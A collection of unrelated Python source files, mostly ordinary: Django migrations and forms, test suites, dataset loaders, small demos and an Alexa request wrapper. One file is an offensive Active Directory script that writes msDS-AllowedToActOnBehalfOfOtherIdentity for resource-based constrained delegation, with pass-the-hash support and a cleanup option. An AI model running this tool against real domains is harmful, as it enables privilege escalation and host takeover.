cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
zauth = AuthSystem.getReadonlyToken(Constants.ZID) #Read only token
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[403])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_Impersonated_Token(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
zauth = AuthSystem.getImpersonatedAuthToken(Constants.ZID) #Impersonated token
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[0])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
if __name__ == '__main__':
#suite0 = unittest.TestLoader().loadTestsFromTestCase(blob_diff)
#unittest.TextTestRunner(verbosity=99).run(suite0)
import testoob
from testoob.reporting import HTMLReporter
testoob.main(html='/opt/zynga/greyhound/current/gh_test/scripts/test/results/blob_delta.html')
|
# Generated by Django 2.2.11 on 2020-03-19 06:34
import django.core.validators
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name="Facility",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("created_date", models.DateTimeField(auto_now_add=True)),
("modified_date", models.DateTimeField(auto_now=True)),
("name", models.CharField(max_length=1000)),
("is_active", models.BooleanField(default=True)),
(
"bed_capacity",
models.IntegerField(
default=0,
validators=[django.core.validators.MinValueValidator(0)],
),
),
(
"icu_capacity",
models.IntegerField(
default=0,
validators=[django.core.validators.MinValueValidator(0)],
),
),
],
options={
"abstract": False,
},
),
migrations.CreateModel(
name="FacilityLocation",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("created_date", models.DateTimeField(auto_now_add=True)),
("modified_date", models.DateTimeField(auto_now=True)),
(
"district",
models.IntegerField(
choices=[
(1, "Thiruvananthapuram"),
(2, "Kollam"),
(3, "Pathanamthitta"),
(4, "Alappuzha"),
(5, "Kottayam"),
(6, "Idukki"),
(7, "Ernakulam"),
(8, "Thrissur"),
(9, "Palakkad"),
(10, "Malappuram"),
(11, "Kozhikode"),
(12, "Wayanad"),
(13, "Kannur"),
(14, "Kasaragod"),
]
),
),
],
options={
"abstract": False,
},
),
migrations.CreateModel(
name="FacilityVolunteer",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("created_date", models.DateTimeField(auto_now_add=True)),
("modified_date", models.DateTimeField(auto_now=True)),
(
"facility",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="facility.Facility",
),
),
(
"volunteer",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
options={
"abstract": False,
},
),
migrations.CreateModel(
name="FacilityStaff",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("created_date", models.DateTimeField(auto_now_add=True)),
("modified_date", models.DateTimeField(auto_now=True)),
(
"facility",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="facility.Facility",
),
),
(
"staff",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
options={
"abstract": False,
},
),
]
|
import io_utils
import numpy as np
import pandas as pd
import shutil
class DataSets:
root_dir = ".."
data_sets = {
'colon': (
{
"path": "/COLON/COLON/colon.data",
},
{
"path": "/COLON/COLON/colon.labels",
"apply_transform": np.sign
}
),
'arcene': (
{
"path": "/ARCENE/ARCENE/arcene.data",
"apply_transform": np.transpose,
"feat_labels": "/ARCENE/ARCENE/arcene_feat.labels"
},
{
'path': "/ARCENE/ARCENE/arcene.labels",
}
),
'dexter': (
{
"feat_labels": "/DEXTER/DEXTER/dexter_feat.labels",
"path": "/DEXTER/DEXTER/dexter.data",
"method": "sparse_matrix",
"args": [20000]
},
{
"path": "/DEXTER/DEXTER/dexter.labels",
}
),
"dorothea": (
{
"feat_labels": "/DOROTHEA/DOROTHEA/dorothea_feat.labels",
"path": "/DOROTHEA/DOROTHEA/dorothea.data",
"method": "sparse_binary_matrix",
"args": [100001],
"apply_transform": lambda x: x[:, :150]
},
{
"path": "/DOROTHEA/DOROTHEA/dorothea.labels",
"apply_transform": lambda x: x[:150]
}
),
"gisette": (
{
"feat_labels": "/GISETTE/GISETTE/gisette_feat.labels",
"path": "/GISETTE/GISETTE/gisette_valid.data",
"apply_transform": lambda x: np.transpose(x)[:, :200],
},
{
"path": "/GISETTE/GISETTE/gisette_valid.labels",
"apply_transform": lambda x: x[:200]
}
),
"artificial": (
{
"feat_labels": "/ARTIFICIAL/ARTIFICIAL/artificial_feat.labels",
"path": "/ARTIFICIAL/ARTIFICIAL/artificial.data.npy",
"method": "numpy_matrix",
},
{
"path": "/ARTIFICIAL/ARTIFICIAL/artificial.labels.npy",
"method": "numpy_matrix",
}
)
}
@staticmethod
def save_artificial(data, labels, feature_labels):
PreComputedData.delete("artificial")
artificial_data_dir = DataSets.root_dir + "/ARTIFICIAL/ARTIFICIAL"
io_utils.mkdir(artificial_data_dir)
data_file_name = artificial_data_dir + "/artificial.data"
label_file_name = artificial_data_dir + "/artificial.labels"
feature_label_file_name = artificial_data_dir + "/artificial_feat.labels"
np.save(data_file_name, data)
np.save(label_file_name, labels)
np.savetxt(feature_label_file_name, feature_labels, fmt='%d')
@staticmethod
def load(data_set):
data_info, labels_info = DataSets.data_sets[data_set]
labels = DataSets.__load_data_set_file(labels_info)
data = DataSets.__load_data_set_file(data_info)
feature_labels = DataSets.load_features_labels(data_set)
if feature_labels is not None:
features = data[[feature_labels == 1]]
probes = data[[feature_labels == -1]]
data = np.vstack((features, probes))
return data, labels
@staticmethod
def __load_data_set_file(info):
data = getattr(io_utils, info.get('method', 'regular_matrix'))(
DataSets.root_dir + info['path'],
*info.get('args', []),
**info.get('kwargs', {})
)
apply_transform = info.get('apply_transform', False)
if apply_transform:
return apply_transform(data)
return data
@staticmethod
def load_features_labels(data_set):
if data_set not in DataSets.data_sets:
return None
data_info, _ = DataSets.data_sets[data_set]
feat_labels_filename = data_info.get('feat_labels', None)
if feat_labels_filename is not None:
return np.loadtxt(DataSets.root_dir + feat_labels_filename)
return None
class PreComputedData:
@staticmethod
def load(data_set, cv, assessment_method, feature_selector):
filename = PreComputedData.file_name(data_set, cv, assessment_method, feature_selector)
try:
return np.load(filename)
except FileNotFoundError:
print("File " + filename + " not found")
raise
@staticmethod
def file_name(data_set, cv, assessment_method, feature_selector):
return "{data_dir}/{feature_selector}.npy".format(
data_dir=PreComputedData.dir_name(data_set, cv, assessment_method),
feature_selector=feature_selector.__name__
)
@staticmethod
def load_cv(data_set, cv):
file_name = PreComputedData.cv_file_name(data_set, cv)
try:
return np.load(file_name)
except FileNotFoundError:
print("CV {} was never generated".format(type(cv).__name__))
raise
@staticmethod
def delete(data_set):
try:
shutil.rmtree(PreComputedData.root_dir(data_set))
except FileNotFoundError:
pass
@staticmethod
def cv_file_name(data_set, cv):
return PreComputedData.cv_dir(data_set, cv) + "/indices.npy"
@staticmethod
def dir_name(data_set, cv, assessment_method):
return "{cv_dir}/{method}".format(
cv_dir=PreComputedData.cv_dir(data_set, cv),
method=assessment_method
)
@staticmethod
def cv_dir(data_set, cv):
return "{data_set_dir}/{cv}".format(
data_set_dir=PreComputedData.root_dir(data_set),
cv=type(cv).__name__
)
@staticmethod
def root_dir(data_set):
return "{root_dir}/pre_computed_data/{data_set}".format(
root_dir=DataSets.root_dir,
data_set=data_set
)
class Analysis:
@staticmethod
def load_csv(data_set, cv, assessment_method, feature_method):
filename = Analysis.file_name(data_set, cv, assessment_method, feature_method) + ".csv"
try:
stats = pd.read_csv(filename)
return stats
except FileNotFoundError:
print("File " + filename + " not found")
raise
@staticmethod
def file_name(data_set, cv, assessment_method, feature_method):
return Analysis.dir_name(data_set, cv, assessment_method) + "/" + feature_method.__name__
@staticmethod
def dir_name(data_set, cv, method):
return "{root_dir}/pre_computed_data/{data_set}/{cv}".format(
root_dir=DataSets.root_dir,
method=method,
data_set=data_set,
cv=type(cv).__name__
)
|
def main(msg):
print(msg)
#Added a comment for pi2
# add a comment for pi3
# a second comment for pi3
main('hello world!!!')
|
import subprocess, os, sys
print os.name
if os.name == 'nt':
print 'so windows'
if os.name == "nt":
#out = subprocess.check_output(["arp", "-a"])
#out = subprocess.check_output("dir", shell=True)
pass
print 'past here'
else:
out = subprocess.check_output(["ls", "-l"])
#print out
#These do no work as WoW64 can not find wsl in System32
#out = subprocess.check_output(["wsl", "opencfu", "-i", "data/samples/blah.jpg"], shell=True)
#out = subprocess.check_output(["wsl", "opencfu", "-i", "data/samples/blah.jpg"])
#This works when calling from windows >wsl python demo-subproc.py
#out = subprocess.check_output(["opencfu", "-i", "data/samples/blah.jpg"])
#This works from windows calling windows python >python demo-subproc.py
wsl_path = "c:/windows/SysNative/wsl.exe"
out = subprocess.check_output([wsl_path, "opencfu", "-i", "data/samples/blah.jpg"])
#Also we do have pipe
cmd = [wsl_path, "opencfu", "-i", "data/samples/blah.jpg"]
cmd.extend([">", "aaa-pipe.txt"])
out = subprocess.check_output(cmd)
if os.name == "nt":
out = subprocess.check_output("dir", shell=True)
print 'direcctory contents should contains aaa-pipe.txt'
print out
print 'len: ', str(len(out))
print 'len 0: ', str(len(out[0]))
print '0: ', str(out[0])
print out[95:98]
print len(out.split("\n"))
#print out
#maybe system attributes on .jpg?
#maybe do [windows]-python call subproc("wsl" "python" "subproc-shell.py")
#-> subproc("opencfu" "-i" "img") [subproc-shell.py]
#OK so python
#https://stackoverflow.com/questions/39812882/python-subprocess-call-cannot-find-windows-bash-exe
#how to first call anything with wsl?
#Explicit_PATH_to_WSL
#c:/windows/system32/wsl.exe
#Explicit_FULL_PATH_to_data
#C:\Python27\python.exe |
# Generated by Django 2.2.4 on 2020-05-07 10:35
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0014_auto_20200507_2028'),
]
operations = [
migrations.AlterField(
model_name='emailverifyrecord',
name='send_time',
field=models.DateTimeField(default=datetime.datetime(2020, 5, 7, 20, 35, 0, 3747), verbose_name='sendTime'),
),
]
|
"""
Имя проекта: practicum_1
Номер версии: 1.0
Имя файла: 23.py
Автор: 2020 © Ю.А. Мазкова, Челябинск
Лицензия использования: CC BY-NC 4.0 (https://creativecommons.org/licenses/by-nc/4.0/deed.ru)
Дата создания: 10/12/2020
Дата последней модификации: 10/12/2020
Связанные файлы/пакеты: numpy, random
Описание: Решение задач № 1-101 практикума № 1
Даны вещественные числа X и Y . Вычислить Z. Z = √(X x Y) при X > Y, Z = ln(X + Y ) в противном случае.
#версия Python: 3.9.0
"""
import math
x = float(input("Введите вещественное число x:"))
y = float(input("Введите вещественное число y:"))
if x > y:
z = math.sqrt(x * y)
print(z)
else:
z = math.log(x + y, math.e)
print(z)
|
from django import forms
from apps.constructora.models import *
import datetime
def validarFecha(date):
if date.month<=9:
fecha=str(date.year)+"-0"+str(date.month)+"-"+str(date.day)
else:
fecha=str(date.year)+"-"+str(date.month)+"-"+str(date.day)
return fecha
fecha=validarFecha(datetime.datetime.now())
class ProyectoForm(forms.ModelForm):
class Meta:
model=Proyecto
fields=[
'idCliente',
'nombreProyecto',
'descripcionProyecto',
'ubicacion',
'fechaInicioConstruccion',
]
labels={
'idCliente':'Elija un Cliente',
'nombreProyecto':'Nombre del Proyecto',
'descripcionProyecto':'Descripción',
'ubicacion':'Dirección',
'fechaInicioConstruccion':'Fecha que iniciará',
}
widgets={
'idCliente':forms.Select(attrs={'class':'form-control'}),
'nombreProyecto':forms.TextInput(attrs={'class':'form-control'}),
'descripcionProyecto':forms.Textarea(attrs={'class':'form-control','rows':2}),
'ubicacion':forms.Textarea(attrs={'class':'form-control','rows':2}),
'fechaInicioConstruccion': forms.TextInput(attrs={'class':'form-control','type':'date', 'min':fecha}),
}
class RecursoForm(forms.ModelForm):
class Meta:
model = Recurso
fields = [
'codigoRecurso',
'nombreRecurso',
'tipoRecurso',
'descripcionRecurso',
]
labels = {
'codigoRecurso' : 'Código',
'nombreRecurso' : 'Nombre',
'tipoRecurso' : 'Tipo de Recurso',
'descripcionRecurso': 'Descripcion',
}
widgets = {
'codigoRecurso' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Código del Recurso'}),
'nombreRecurso' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Nombre del Recurso'}),
'tipoRecurso' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Tipo de Recurso'}),
'descripcionRecurso' : forms.Textarea(attrs={'rows':5, 'class':'form-control','placeholder':'Escriba la descripción del Recurso'}),
}
class RecursoForm_2(forms.ModelForm):
class Meta:
model = Recurso
fields = [
'codigoRecurso',
'nombreRecurso',
'tipoRecurso',
'descripcionRecurso',
]
labels = {
'codigoRecurso' : 'Código',
'nombreRecurso' : 'Nombre',
'tipoRecurso' : 'Tipo de Recurso',
'descripcionRecurso': 'Descripcion',
}
widgets = {
'codigoRecurso' : forms.TextInput(attrs={'class':'form-control','readonly':'readonly','placeholder':'Escriba el Código del Recurso'}),
'nombreRecurso' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Nombre del Recurso'}),
'tipoRecurso' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Tipo de Recurso'}),
'descripcionRecurso' : forms.Textarea(attrs={'rows':5, 'class':'form-control','placeholder':'Escriba la descripción del Recurso'}),
}
class EjemplarForm(forms.ModelForm):
class Meta:
model = Ejemplar
fields = [
'codigoEjemplar',
'nombreEjemplar',
'descripcionEjemplar',
]
labels = {
'codigoEjemplar' : 'Código',
'nombreEjemplar' : 'Nombre',
'descripcionEjemplar': 'Descripcion',
}
widgets = {
'codigoEjemplar' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Código del Ejemplar'}),
'nombreEjemplar' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Nombre del Ejemplar'}),
'descripcionEjemplar' : forms.Textarea(attrs={'rows':3, 'class':'form-control','placeholder':'Escriba la descripción del Ejemplar'}),
}
class HerramientaForm(forms.ModelForm):
class Meta:
model = Herramienta
fields = [
'codigoHerramienta',
'nombreHerramienta',
'cantidadHerramienta',
'descripcionHerramienta',
]
labels = {
'codigoHerramienta' : 'Código',
'nombreHerramienta' : 'Nombre',
'cantidadHerramienta' : 'Cantidad de herramientas',
'descripcionHerramienta' : 'Descripcion',
}
widgets = {
'codigoHerramienta' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Código de la Herramienta'}),
'nombreHerramienta' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Nombre de la Herramienta'}),
'cantidadHerramienta' : forms.NumberInput(attrs={'class':'form-control','placeholder':'Escriba el numero de Herramientas','min':'0'}),
'descripcionHerramienta' : forms.Textarea(attrs={'rows':3, 'class':'form-control','placeholder':'Escriba la descripción de la Herramienta'}),
}
class EmpleadoForm(forms.ModelForm):
class Meta:
model=Empleado
fields=[
'nombres',
'apellidos',
'direccion',
'numTelefono',
'dui',
'nit',
'isss',
]
labels={
'nombres':'Nombre: ',
'apellidos':'Apellido: ',
'direccion':'Direccion: ',
'numTelefono':'Telefono: ',
'dui':'Dui: ',
'nit':'Nit: ',
'isss':'Isss: ',
}
widgets={
'nombres':forms.TextInput(attrs={'class':'form-control'}),
'apellidos':forms.TextInput(attrs={'class':'form-control'}),
'direccion':forms.TextInput(attrs={'class':'form-control'}),
'numTelefono':forms.TextInput(attrs={'class':'form-control'}),
'dui':forms.TextInput(attrs={'class':'form-control'}),
'nit':forms.TextInput(attrs={'class':'form-control'}),
'isss':forms.TextInput(attrs={'class':'form-control'}),
}
class clienteForm(forms.ModelForm):
class Meta:
model=Cliente
fields=[
'nombreCliente',
'direccion',
'email',
'nit',
'giro',
'numTelefono',
]
labels={
'nombreCliente':'Nombre completo',
'direccion':'Direccion',
'email': 'Email',
'nit': 'Nit',
'giro': 'Giro',
'numTelefono':'Telefono',
}
widgets={
'nombreCliente':forms.TextInput(attrs={'class':'form-control'}),
'direccion':forms.TextInput(attrs={'class':'form-control'}),
'email':forms.TextInput(attrs={'class':'form-control'}),
'nit':forms.TextInput(attrs={'class':'form-control'}),
'giro':forms.TextInput(attrs={'class':'form-control'}),
'numTelefono':forms.TextInput(attrs={'class':'form-control'}),
}
class ContratoForm(forms.ModelForm):
class Meta:
model=Contrato
fields=[
'descripcion',
'periodoContrato',
]
labels={
'descripcion':'Descripción: ',
'periodoContrato':'Periodo de contrato: ',
}
widgets={
'descripcion':forms.Textarea(attrs={'class':'form-control','rows':2}),
'periodoContrato':forms.TextInput(attrs={'class':'form-control'}),
}
class puestoForm(forms.ModelForm):
class Meta:
model=Puesto
fields=[
'nombrePuesto',
'descripcionPuesto',
]
labels={
'nombrePuesto':'Nombre de puesto: ',
'descripcionPuesto':'Descripcion de puesto: ',
}
widgets={
'nombrePuesto':forms.TextInput(attrs={'class':'form-control'}),
'descripcionPuesto':forms.Textarea(attrs={'class':'form-control','rows':2}),
} |
#!/usr/bin/env python3
from ldap3 import ALL, Server, Connection, MODIFY_REPLACE, NTLM, MODIFY_DELETE, SASL, KERBEROS
from binascii import unhexlify
from impacket.ldap.ldaptypes import SR_SECURITY_DESCRIPTOR
import argparse
parser = argparse.ArgumentParser(description='Set SD for controlled computer object to a target object for RBCD')
parser.add_argument('-u','--username', help='username for LDAP', required=False)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-p','--password', help='password for LDAP')
group.add_argument('-H','--hash', help='LM:NT hash for LDAP')
group.add_argument('-k', '--kerberos', help='Kerberos Auth GSSAPI',action='store_true')
parser.add_argument('-d','--domain', help='LDAP server/domain', required=True)
parser.add_argument('-t','--targetDn', help='Target distinguishedName (Example: "CN=DC1,OU=Domain Controllers,DC=lab,DC=local")', required=True)
parser.add_argument('-c','--contrDn', help='Controlled computer distingushedName to add to msDS-AllowedToActOnBehalfOfOtherIdentity attribute', required=True)
parser.add_argument('-l','--ldapserver', help='LDAP server, in case it cant resolve', required=False)
parser.add_argument('--cleanup', help='Delete msDS-AllowedToActOnBehalfOfOtherIdentity value',action='store_true', required=False)
def main():
args = parser.parse_args()
if (args.ldapserver):
server = args.ldapserver
else:
server = args.domain
username = "{}\\{}".format(args.domain, args.username)
s = Server(server, get_info=ALL)
if (args.password):
conn = Connection(s, user=username, password=args.password, authentication=NTLM, auto_bind=True)
elif (args.hash):
conn = Connection(s, user=username, password=args.hash, authentication=NTLM, auto_bind=True)
elif (args.kerberos):
if not (args.ldapserver):
print("Error: Specify DC for ldapserver argument")
exit()
else:
conn = Connection(s, sasl_credentials=(args.ldapserver,), authentication=SASL, sasl_mechanism=KERBEROS, auto_bind=True)
conn.search(args.contrDn,"(objectClass=Computer)",attributes=['objectSID'])
contrSid = conn.entries[0]['objectSID'].raw_values[0]
#SD full value with removed SID
sd_bytes = unhexlify(b'010004804000000000000000000000001400000004002c000100000000002400ff010f000000000000000000000000000000000000000000000000000000000001020000000000052000000020020000')
sd = SR_SECURITY_DESCRIPTOR(data=sd_bytes)
sd['Dacl'].aces[0].fields['Ace'].fields['Sid'].setData(contrSid)
if (args.cleanup == True):
if(conn.modify(args.targetDn,{'msDS-AllowedToActOnBehalfOfOtherIdentity':[MODIFY_DELETE, []]})):
print("Successfully cleaned up!")
else:
print("An error was encountered, D:")
else:
if (conn.modify(args.targetDn,{'msDS-AllowedToActOnBehalfOfOtherIdentity':[MODIFY_REPLACE, sd.getData()]})):
print("Successfully added permissions!")
else:
print("An error was encountered, D:")
if __name__ == "__main__":
main()
|
import numpy as np
import matplotlib as mpl
mpl.use('TkAgg')
import matplotlib.pyplot as plt
from time import sleep
N = 50
x1 = np.random.random((N,2))
x1 = x1
c = x1[:,0]+x1[:,1]>1
x1 = np.hstack([x1,np.reshape(c,(N,1))])
type1 = np.array(list(filter(lambda x: x[2] == 0, x1)))
type2 = np.array(list(filter(lambda x: x[2] > 0, x1)))
# print type1,"\n\n",type2
plt.scatter(type1[:,0],type1[:,1],marker="o",c="r",label="class-0")
plt.scatter(type2[:,0],type2[:,1],marker="x",c="b",label="class-1")
plt.xlabel("x")
plt.ylabel("y")
plt.legend()
plt.title("Check it out")
plt.axis([0,1,0,1])
# print "FEATURE MATRIX",x1[:,0:2]
w = np.array([[0, 0, 0]])
Y = np.array([])
i=0
x11 = np.hstack((np.ones((N,1)),x1[:,0:2]))
y11=x1[:,2]
print x11,y11
t=0
alpha = 0.1
def graph(w0 = [-.5, 1, 0],bold=False):
dontplot = 0
if w0[1]!=0 and w0[2]!=0:
y = np.arange(0, 1, 0.1)
x=(-w0[0] - w0[2] * y)/w0[1]
else:
if w0[1]==0 and w0[2]!=0:
x=np.arange(0, 1, 0.1)
y=(-w0[0])/w0[2]
elif w0[1]!=0 and w0[2]==0:
y = np.arange(0, 1, 0.1)
x = (-w0[0])/w0[1]
else:
dontplot =1
if dontplot!=1:
if bold==True:
plt.plot(x,y,linewidth=7.0)
else:
plt.plot(x,y)
plt.pause(0.02)
def net_input(x,w):
return np.dot(x,w[1:]) + w[0]
def predict(x,w):
return np.where(net_input(x,w)>=0.0,1,-1)
while(len(Y)!=0 or i==0):
Y = []
i=1
s=np.array([0,0,0],dtype='float64')
for key,val in enumerate(x11):
if y11[key] == 0:
delta = -1
else:
delta = 1
if delta*w[t].transpose().dot(val) >= 0 :
Y.append(np.hstack((val, delta)))
print "Y---",len(Y)," ",Y
graph(w[t])
if len(Y)==0:
graph(w[-1],True)
print 'solution',w[-1]
break
for item in Y:
s+=item[3]*item[0:3]
s=alpha*s
print "s:",s," alpha:",alpha
t=t+1
z = w[t - 1] - s
zx = []
zx.append(z)
w = np.concatenate((w,np.array(zx)))
print "W",t," ",w
if t==100:
break
plt.show() |
''' Imports '''
# optical model components
from .optics import std_opt_params, gen_optics, gen_optics_rev
# image translation
from .image import import_image, gen_image
from .image import gen_img_rays, gen_rev_rays, get_paths, translate_image
# batch image generation protocols
from .batch import init_optics, batch_translate, store_images
# helper display functions
from .display import plot_3d_ellipsoid, plot_3d_line
''' development only - direct access to module functions '''
'''
# functions
from .engine import *
'''
'''
# module
from . import engine
'''
|
from tornado.escape import json_encode,json_decode
from tornado.gen import coroutine
from mod.base.base import BaseHandler
from mod.base.exceptions import ArgsError, PermissionDeniedError,OtherError
class GetAddressHandler(BaseHandler):
@coroutine
def post(self):
token = self.get_json_argument("token")
curuser = yield self.db.execute(#ensure the user exists
"SELECT * FROM customer WHERE token=%s",
(
token
)
)
if curuser.rowcount == 0:
state = {'address':'token_error'}
self.fin_succ(**state)
else:
user = curuser.fetchone()
tel_phone=user["tel_phone"]
cur = yield self.db.execute(
"SELECT * FROM User_used_address WHERE tel_phone=%s order by is_def desc",
(
tel_phone
)
)
user = cur.fetchall()
state={"address":user}
self.fin_succ(**state)
|
import names
import uuid
import numpy as np
from activity_model import ActivityModel
AMOUNT = 100
class Worker:
def __init__(self, pool, weights = None, surname = None):
self.name = names.get_first_name() + " " + surname if surname != None else names.get_full_name()
self.pool = pool
self.model = ActivityModel(weights)
self.funds = 100000
self.portfolio = []
#print("[Pool %s][%s] Worker initialised" % (self.pool, self.name))
def action(self, prediction_values_X, actual_values_X, tag):
#print("[Worker %s] Acting..." % (self.name)) #Buy
predict = self.model.predict(prediction_values_X)
action = np.argmax(predict) # What value had the highest confidence
success = False
if action == 0:
#print("[Worker %s] No Action" % (self.name)) #Nothing
success = True
elif action == 1:
#print("[Worker %s] Buy at %f" % (self.name, actual_values_X[0][-1])) #Buy
if self.funds >= AMOUNT * actual_values_X[0][-1]:
self.portfolio.append({
"id": uuid.uuid4(),
"tag": tag,
"amount": AMOUNT,
"at_value": actual_values_X[0][-1]
})
success = True
#else:
#print("[Worker %s] Is a poor boye and can't afford to buy %s" % (self.name, tag))
elif action == 2:
#print("[Worker %s] Sell" % (self.name)) #Sell
removed = False
for stock in self.portfolio:
if stock["tag"] == tag:
self.portfolio.remove(stock)
removed = stock
break
if removed:
funcs_inc = stock["amount"] * actual_values_X[0][-1]
self.funds += funcs_inc
bought_for = stock["amount"] * stock["at_value"]
difference = funcs_inc - bought_for
profit_or_loss = "profit" if difference > 0 else "loss"
#print("[Worker %s] Sold %s for %f, a %s of %f" % (self.name, tag, funcs_inc, profit_or_loss, difference))
success = True
#else:
#print("[Worker %s] Tried to sell %s, but doesn't have any %s stocks in its portfolio, wot" % (self.name, tag, tag))
return action, success
def get_funds(self):
return self.funds |
def print_n_times(num):
for i in range(num):
print(i)
def print_n_times_rec(num):
if num >= 0:
print(num)
return print_n_times_rec(num-1)
else:
return None
def print_n_times_asc_rec(num, count=0):
if num > count:
num += 1
print(count)
return print_n_times_asc_rec(num - 1, count + 1)
else:
return
print_n_times(100)
|
from .errors import *
class AlexaRequest:
"""Represents a request sent by Alexa
--- Attributes ---
version - str
the version of the request
session_is_new - bool
True if session was just created
session_id - str
id of the current session
app_id - str
id of the skill
attributes - dict
session attributes that persist in session
user_id - str
id of the user
access_token - str
user's access token
consent_token - str
user's consent token
device_id - str
id of the device being used
supported_interfaces - str
interfaces supported by the current device
api_endpoint - str
endpoint of the Alexa API
api_access_token - str
access token for the Alexa API
audio_player - dict
AudioPlayer object containing audio player properties
--- Methods ---
slot_value(name)
returns the slot value of the slot name passed in
"""
def __init__(self, event):
self.event = event
# --- Getters
@property
def version(self):
return self.event["version"]
@property
def session_is_new(self):
return self.event["session"]["new"]
@property
def session_id(self):
return self.event["session"]["sessionid"]
@property
def app_id(self):
return self.event["sessoin"]["applicationId"]
@property
def attributes(self):
try:
return self.event["session"]["attributes"]
except KeyError:
return None
# allows usage of either "attributes" or "session_attributes"
@property
def session_attributes(self):
return self.attributes
@property
def user_id(self):
return self.event["session"]["user"]["userId"]
@property
def access_token(self):
return self.event["session"]["user"]["accessToken"]
@property
def consent_token(self):
return self.event["session"]["user"]["permissions"]["consentToken"]
@property
def device_id(self):
return self.event["context"]["System"]["device"]["deviceId"]
@property
def supported_interfaces(self):
return self.event["context"]["System"]["device"]["deviceId"]
@property
def api_endpoint(self):
return self.event["context"]["System"]["apiEndpoint"]
@property
def api_access_token(self):
return self.event["context"]["System"]["apiAccessToken"]
@property
def audio_player(self): # replace with an AudioPlayer object
return self.event["context"]["System"]["AudioPlayer"]
# --- Methods
def has_value(self, slotName):
"""Returns True if a slot has a value
--- Parameters ---
slotName - str
the name of the slot to check for a value
"""
if "value" in self.event["request"]["intent"]["slots"][slotName]:
return True
else:
return False
def slot_value(self, slotName):
"""Returns the slot value of a given slot
--- Parameters ---
slotName - str
the name of the slot to get the value of
"""
if self.has_value(slotName):
return self.event["request"]["intent"]["slots"][slotName]["value"]
else:
raise(NoSlotValueError("There was no slot value for slot '%s'" % slotName))
|
# -*- coding: utf-8 -*-
"""
Template para tratar erros de leitura de titulos de paginas web
durante a realizacao de um web scraping
"""
# Importacao das bibliotecas
from bs4 import BeautifulSoup
from urllib.request import urlopen
from urllib.error import HTTPError, URLError
# Funcao para tratar erros de retorno na leitura dos titulos das paginas web
def getTitulo(url):
try:
html = urlopen(url)
except HTTPError as erro:
print("Ocorreu erro HTTP: {erro}")
return None
except URLError as erro:
print("Ocorreu erro URL: {erro}")
return None
except:
print("Ocorreu erro na pagina!")
return None
try:
sopa = BeautifulSoup(html.read(), "html.parser")
titulo = sopa.body.h1
except AttributeError as erro:
print("Ocorreu erro ao acessar a tag: {erro}")
return None
except:
print("Ocorreu erro ao acessar o conteudo da pagina!")
return None
return titulo
titulo = getTitulo(input("Informe a URL completa: "))
if titulo is not None:
print(titulo)
else:
print("Titulo nao encontrado!")
|
import logging
import os
import re
import time
from threading import Event
import psutil
from common.timer import Timer
logger = logging.getLogger('log01')
class BatchCheckBase:
def __init__(self, pattern_id, urls):
self.usr_dict = {}
self.usr_list = []
self.pattern_id = pattern_id
for url in urls:
self.get_id(url)
def get_id(self, url):
m = re.match(self.pattern_id, url)
if m:
usr_id = m.group('id')
self.usr_dict[usr_id.lower()] = url
self.usr_list.append(usr_id)
def check(self):
pass
class Monitoring(Timer):
def __init__(self, parent_pid, file_name):
super().__init__(func=self.kill_child_processes, interval=20)
self.parent = self.children = self.numc = None
self.parent_pid = parent_pid
self.file_name = file_name + '.part'
